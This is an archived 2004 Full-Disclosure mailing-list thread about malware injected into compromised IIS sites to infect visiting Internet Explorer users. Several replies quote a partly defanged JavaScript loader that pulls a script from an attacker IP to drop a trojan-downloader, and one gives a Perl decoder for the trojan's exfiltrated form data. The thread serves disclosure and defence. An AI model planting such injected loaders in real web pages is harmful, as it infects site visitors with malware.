Re: [Full-Disclosure] New malware to infect IIS and from there jump to clients
From: insecure [EMAIL PROTECTED] To: [EMAIL PROTECTED] Date: Fri, 25 Jun 2004 12:36:41 -0500 ... Berbew/Webber/Padodor Trojan, according to Lurhq. http://www.lurhq.com/berbew.html This web page mentions: content:id=crutop|26|vvpupkin0= The upload is in an encoded format that consists of records that specify a machine name, a user name, and a web site that includes an HTML form. For example, if the machine name were BINDVIEW-LAB-17, the user name were labuser, and the form were on http://www.example.com/, then the uploaded data would be sent via HTTP POST, and consist of: id=crutopvvpupkin0=asadaeafbeabanbzceclcbbncecabmdocjbwbzdocmcsvvpupkin1=asadaeafbeabanbdaqataeacauadvvpupkin2=asadaeafbeabanazafafabcxdqdqagagagdrauajaqbcabbdaudrasbebcdqddcdckbjcibucn The POST data is sent to one of the web sites specified in http://tms.symantec.com/documents/040624-Alert-CompromisedIISServerReports.pdf The data can be decoded with the following perl script: #!/usr/bin/perl use bytes; $i = STDIN; chomp($i); @r = split /\/, $i; for ($i = 0; $i = $#r; ++$i) { next if ($r[$i] !~ /^vvpupkin/); @p = split /=/, $r[$i]; for ($j = 0; $j length($p[1]) / 2; ++$j) { $c1 = substr($p[1], 2 * $j, 1); $c2 = substr($p[1], (2 * $j) + 1, 1); $o1 = ord($c1) - ord(a); $o2 = ord($c2) - ord(a); print chr(((26 * $o1) + $o2) ^ 113); } print \n; } The output of the perl script is: crutop|BINDVIEW-LAB-17 crutop|labuser crutop|http://www.example.com/ FORM_0 Matt Power BindView Corporation, RAZOR Team [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] New malware to infect IIS and from there jump to clients
Just a reminder. This isn't the first time this has happened: http://www.computerworld.com/securitytopics/security/story/0,10801,84675,00.html?SKC=home84675 -- Gary Flynn Security Engineer James Madison University ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] New malware to infect IIS and from there jump to clients
For the IIS side http://www.microsoft.com/security/incident/download_ject.mspx Microsoft teams are investigating a report of a security issue affecting customers using Microsoft Internet Information Services 5.0 (IIS) and Microsoft Internet Explorer, components of Windows. Important Customers who have deployed Windows XP Service Pack 2 RC2 are not at risk. Reports indicate that Web servers running Windows 2000 Server and IIS that have not applied update 835732, which was addressed by Microsoft Security Bulletin MS04-011, are possibly being compromised and being used to attempt to infect users of Internet Explorer with malicious code. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Peter Kruse Sent: Thursday, June 24, 2004 7:22 PM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] New malware to infect IIS and from there jump to clients Hi all, This is a heads up. A new malware has been reported from several sources so it appears to be fairly widespread already. The malware spreads from infected IIS servers to clients that visit the webpage of the infected server. How the IIS servers was compromised in the first place is unfortunately still unknown (any info on that would be appreciated). The malware redirects a visitor to http: //217.107.218.147/xxx.php. It does so by running a javascript that apparently gets appended to several files in the webfolder of IIS (eg. html, .txt, .gif). The webpage loads http:// 217.107.218.147/xxx.html that contains the following code: script language=Javascript function InjectedDuringRedirection(){ showModalDialog('md.htm', window, dialog Top: -1\;dialogLeft:-1\;dialog Height :1\;dialog Width :1\;).location= java script:'SCRIPT SRC =\\' http:// 217.107.218.147/shellxxx.js\\' \ /script'; [snip - you get the picture, right?] I had to put in some spaces to get past trivial content filtering. From that point it will try to run the malware in a 1x1 dialogbox in the following order: shellscript_loadxxx.js shellxxx.js The shellxxx.js will try to drop msits.exe (51.712 bytes) a trojan-downloader and run it. Consider to deny access to http://217.107.218.147 in your firewall. This will at least prevent client PCs from getting infected. Further information can be found in the daily log from SANS: http://isc.sans.org/ Regards Peter Kruse http://www.csis.dk ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] New malware to infect IIS and from there jump to clients
With the current (in)security of most (if not all) ISP that provide ASP.Net or ASP Classic shared hosting services, all the attakers need to do is to get an hosting account in a shared hosting server (trivial) and infect these websites from the inside. I haven't heard of any new IIS exploit (which doesn't mean that they don't exist), but compromizing the IIS box from the inside (as seen by the interland story) is probably how this happened. BTW, do you know which ISP hosts the 'compromized' websites? Dinis Cruz .Net Security Consultant DDPlus On Fri, 25 Jun 2004 09:20:34 -0400, Gary Flynn wrote Just a reminder. This isn't the first time this has happened: http://www.computerworld.com/securitytopics/security/story/0,10801,84675,00.html?SKC=home84675 -- Gary Flynn Security Engineer James Madison University ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html Scanned by Emailfiltering.co.uk ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] New malware to infect IIS and from there jump to clients
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 This is impossible. Microsoft products are inherently secure. We have a patched IIS as stated by the alert, an alpha security patch for the operating system and open holes in the browser. No doubt this is a vicuous anti-Microsoft attempt to discredit their security commitments by people who are jealous of Bill Gates wealth. That or maybe by disgruntled individuals who failed to earn their MVP status. For the IIS side http://www.microsoft.com/security/incident/download_ject.mspx Microsoft teams are investigating a report of a security issue affecting customers using Microsoft Internet Information Services 5.0 (IIS) and Microsoft Internet Explorer, components of Windows. Important Customers who have deployed Windows XP Service Pack 2 RC2 are not at risk. Reports indicate that Web servers running Windows 2000 Server and IIS that have not applied update 835732, which was addressed by Microsoft Security Bulletin MS04-011, are possibly being compromised and being used to attempt to infect users of Internet Explorer with malicious code. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Peter Kruse Sent: Thursday, June 24, 2004 7:22 PM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] New malware to infect IIS and from there jump to clients Hi all, This is a heads up. A new malware has been reported from several sources so it appears to be fairly widespread already. The malware spreads from infected IIS servers to clients that visit the webpage of the infected server. How the IIS servers was compromised in the first place is unfortunately still unknown (any info on that would be appreciated). The malware redirects a visitor to http: //217.107.218.147/xxx.php. It does so by running a javascript that apparently gets appended to several files in the webfolder of IIS (eg. html, .txt, .gif). The webpage loads http:// 217.107.218.147/xxx.html that contains the following code: script language=Javascript function InjectedDuringRedirection(){ showModalDialog('md.htm', window, dialog Top: -1\;dialogLeft:-1\;dialog Height :1\;dialog Width :1\;).location= java script:'SCRIPT SRC =\\' http:// 217.107.218.147/shellxxx.js\\' \ /script'; [snip - you get the picture, right?] I had to put in some spaces to get past trivial content filtering. From that point it will try to run the malware in a 1x1 dialogbox in the following order: shellscript_loadxxx.js shellxxx.js The shellxxx.js will try to drop msits.exe (51.712 bytes) a trojan-downloader and run it. Consider to deny access to http://217.107.218.147 in your firewall. This will at least prevent client PCs from getting infected. Further information can be found in the daily log from SANS: http://isc.sans.org/ Regards Peter Kruse http://www.csis.dk ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.4 wkYEARECAAYFAkDcPmgACgkQ9hJzGKhH2Ld2CgCguxLYUab6EyIAef5qK5YVBK3JDX0A n1iDB7VSzmP2NVQyeldO+9agWW8q =Uc5R -END PGP SIGNATURE- Concerned about your privacy? Follow this link to get secure FREE email: http://www.hushmail.com/?l=2 Free, ultra-private instant messaging with Hush Messenger http://www.hushmail.com/services.php?subloc=messengerl=434 Promote security and make money with the Hushmail Affiliate Program: http://www.hushmail.com/about.php?subloc=affiliatel=427 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] New malware to infect IIS and from there jump to clients
Berbew/Webber/Padodor Trojan, according to Lurhq. http://www.lurhq.com/berbew.html joe wrote: For the IIS side http://www.microsoft.com/security/incident/download_ject.mspx Microsoft teams are investigating a report of a security issue affecting customers using Microsoft Internet Information Services 5.0 (IIS) and Microsoft Internet Explorer, components of Windows. Important Customers who have deployed Windows XP Service Pack 2 RC2 are not at risk. Reports indicate that Web servers running Windows 2000 Server and IIS that have not applied update 835732, which was addressed by Microsoft Security Bulletin MS04-011, are possibly being compromised and being used to attempt to infect users of Internet Explorer with malicious code. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Peter Kruse Sent: Thursday, June 24, 2004 7:22 PM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] New malware to infect IIS and from there jump to clients Hi all, This is a heads up. A new malware has been reported from several sources so it appears to be fairly widespread already. The malware spreads from infected IIS servers to clients that visit the webpage of the infected server. How the IIS servers was compromised in the first place is unfortunately still unknown (any info on that would be appreciated). The malware redirects a visitor to http: //217.107.218.147/xxx.php. It does so by running a javascript that apparently gets appended to several files in the webfolder of IIS (eg. html, .txt, .gif). The webpage loads http:// 217.107.218.147/xxx.html that contains the following code: script language=Javascript function InjectedDuringRedirection(){ showModalDialog('md.htm', window, dialog Top: -1\;dialogLeft:-1\;dialog Height :1\;dialog Width :1\;).location= java script:'SCRIPT SRC =\\' http:// 217.107.218.147/shellxxx.js\\' \ /script'; [snip - you get the picture, right?] I had to put in some spaces to get past trivial content filtering. From that point it will try to run the malware in a 1x1 dialogbox in the following order: shellscript_loadxxx.js shellxxx.js The shellxxx.js will try to drop msits.exe (51.712 bytes) a trojan-downloader and run it. Consider to deny access to http://217.107.218.147 in your firewall. This will at least prevent client PCs from getting infected. Further information can be found in the daily log from SANS: http://isc.sans.org/ Regards Peter Kruse http://www.csis.dk ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] New malware to infect IIS and from there jump to clients
Peter Kruse [EMAIL PROTECTED] wrote: This is a heads up. Or... PANIC, PANIC, PANIC... A new malware has been reported from several sources so it appears to be fairly widespread already. The malware spreads from infected IIS servers to clients that visit the webpage of the infected server. How the IIS servers was compromised in the first place is unfortunately still unknown (any info on that would be appreciated). There is _no_ evidence (yet) that this is spreading from infected IIS servers. _Some_ IIS admins whose servers are involved don't know how the content got on their servers, but that is far from grounds for claiming said servers are, or even may be, infected. Of course they might be, but history suggests that slack admin'ing is at least as likely as an explanation... The malware redirects a visitor to http: //217.107.218.147/xxx.php. It does so by running a javascript that apparently gets appended to several files in the webfolder of IIS (eg. html, .txt, .gif). The webpage loads http:// 217.107.218.147/xxx.html that contains the following code: script language=Javascript function InjectedDuringRedirection(){ showModalDialog('md.htm', window, dialog Top: -1\;dialogLeft:-1\;dialog Height :1\;dialog Width :1\;).location= java script:'SCRIPT SRC =\\' http:// 217.107.218.147/shellxxx.js\\' \ /script'; [snip - you get the picture, right?] I had to put in some spaces to get past trivial content filtering. From that point it will try to run the malware in a 1x1 dialogbox in the following order: shellscript_loadxxx.js shellxxx.js The shellxxx.js will try to drop msits.exe (51.712 bytes) a trojan-downloader and run it. It does this via the now very old ms-its: protocol zone-handling bug... Apparently someone needs to decode a few more levels of JavaScript, etc to work this all out... Consider to deny access to http://217.107.218.147 in your firewall. This will at least prevent client PCs from getting infected. Thanks Peter, but what about all the _other_ servers out there also hosting more or less exactly the same files? Are you going to provide a list of all those IPs too? I've seen several (probably 5 or 6 others) in the last week or so with all the same files or just one difference (ignoring the trivial script differences necessitated by referring to different hosts) -- the .EXE that is eventually downloaded is a different variant. Further information can be found in the daily log from SANS: http://isc.sans.org/ Woohoo -- SANS incident handlers have reported one incident of this they know about so the sky must be falling! Next... -- Nick FitzGerald Computer Virus Consulting Ltd. Ph/FAX: +64 3 3529854 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html